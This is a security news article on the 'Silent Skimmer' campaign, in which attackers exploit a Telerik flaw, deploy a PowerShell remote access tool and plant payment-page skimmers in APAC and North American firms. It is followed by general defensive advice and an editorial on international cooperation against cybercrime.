Cybercrime: Chinese Hackers Target North American, APAC Firms in Web Skimmer Campaign
Chinese hackers have been launching a widespread and sophisticated campaign targeting online payment businesses with web skimmers. The campaign, dubbed “Silent Skimmer,” was initially focused on organizations in the APAC region but has expanded to businesses in Canada and the United States. The attackers appear to be experienced and resourceful, continuously adjusting their infrastructure to avoid detection as they expand to new territories.
Method of Attack
These hackers have been targeting multiple industries that host or create payment infrastructure, including online businesses and point-of-sale providers. They exploit vulnerabilities in internet-facing applications to gain initial access and deploy various tools to escalate privileges, execute code, and gain remote access.
The attackers use an HTTP File Server (HFS) deployed on a temporary virtual private server (VPS) to host all their tools and post-exploitation payloads. The location of the VPS is chosen based on the victim’s location to further evade detection. To execute code remotely on targeted servers, the threat actor exploits a .NET deserialization vulnerability in the Progress Telerik UI for ASP.NET AJAX. This vulnerability allows the attackers to deploy a remote access tool (RAT) in the form of a PowerShell script, which gives them full control over the compromised systems.
The RAT enables the attackers to gather system information, download or upload files, search for files, connect to a database, and more. Furthermore, the server hosting the RAT contains a variety of tools, including downloader scripts, remote access scripts, webshells, exploits, and Cobalt Strike beacons.
The Goal: Harvesting User Information
The ultimate aim of this campaign is to deploy a web skimmer on the payment checkout pages of targeted organizations. Web skimmers are malicious code injected into websites to collect user information such as billing information and credit card details. The harvested data is exfiltrated using Cloudflare, a popular content delivery network service.
According to BlackBerry, the threat actor mainly targets regional websites that collect payment data. The attacks appear to be opportunistic rather than industry-specific. The threat actor’s identity remains unknown at this time, but the code in the PowerShell RAT is in simplified Chinese, and the attacker’s command-and-control server is located in Asia, specifically Japan. These factors suggest that the threat actor speaks Chinese and operates in Asia.
The Importance of Internet Security
This campaign highlights the ongoing importance of internet security for organizations that collect and process payment data. It is crucial for businesses to regularly update and patch their software and systems to protect against known vulnerabilities. Additionally, implementing strong access controls, network segmentation, and monitoring systems can help detect and prevent unauthorized access.
Organizations should also invest in robust intrusion detection and prevention systems to identify and block any suspicious activity promptly. It is crucial to educate employees about phishing and other social engineering techniques to prevent them from inadvertently providing access to attackers.
Editorial: The Growing Threat of Cybercrime
This targeted campaign by Chinese hackers is indicative of the escalating threat of cybercrime globally. As more businesses and individuals rely on online payment systems, the potential monetary gain for hackers increases. This case demonstrates the importance of international cooperation and information sharing to combat cybercriminals effectively.
Nations need to work together to establish clear guidelines and regulations for cybersecurity, particularly concerning cross-border attacks. This should include sharing threat intelligence and collaborating on investigations to identify and apprehend cybercriminals.
Furthermore, organizations must prioritize cybersecurity in their budgets and allocate resources to ensure their systems are secure. Investment in advanced cybersecurity technologies and training for employees can help mitigate the risk of cyberattacks and protect sensitive customer data.
Conclusion
The Silent Skimmer campaign conducted by Chinese hackers poses a significant threat to online payment businesses across North America and the APAC region. With sophisticated attack techniques and the ability to continually adapt their infrastructure, these hackers have proven to be resourceful and persistent.
To protect against such attacks, organizations must prioritize internet security and take proactive steps to secure their systems and educate employees about potential threats. Additionally, international collaboration and information sharing are crucial in the fight against cybercrime.
<< photo by cottonbro studio >>
The image is for illustrative purposes only and does not depict the actual situation.
You might want to read !
- The Urgency of Implementing Cybersecurity Recommendations: A Call to Action
- The Future of Data Protection: Alcion Secures $21 Million to Revolutionize Backup-as-a-Service
- The Struggle to Safeguard Generative AI: Exploring Solutions for Data Leakage
- The Enigma Unraveled: Microsoft’s Insight Into the Chinese Hackers’ Stolen Signing Key
- Cyber Espionage: The Rise of Chinese Android Spyware
- Sophisticated Chinese APT41 Hackers Unleash WyrmSpy and DragonEgg Spyware on Mobile Devices
- See Tickets Takes Urgent Action to Protect 300,000 Customers from Web Skimmer Attack
- The Risks and Implications of Web Skimmer Attack Targeting Magento, WooCommerce, WordPress, and Shopify Websites
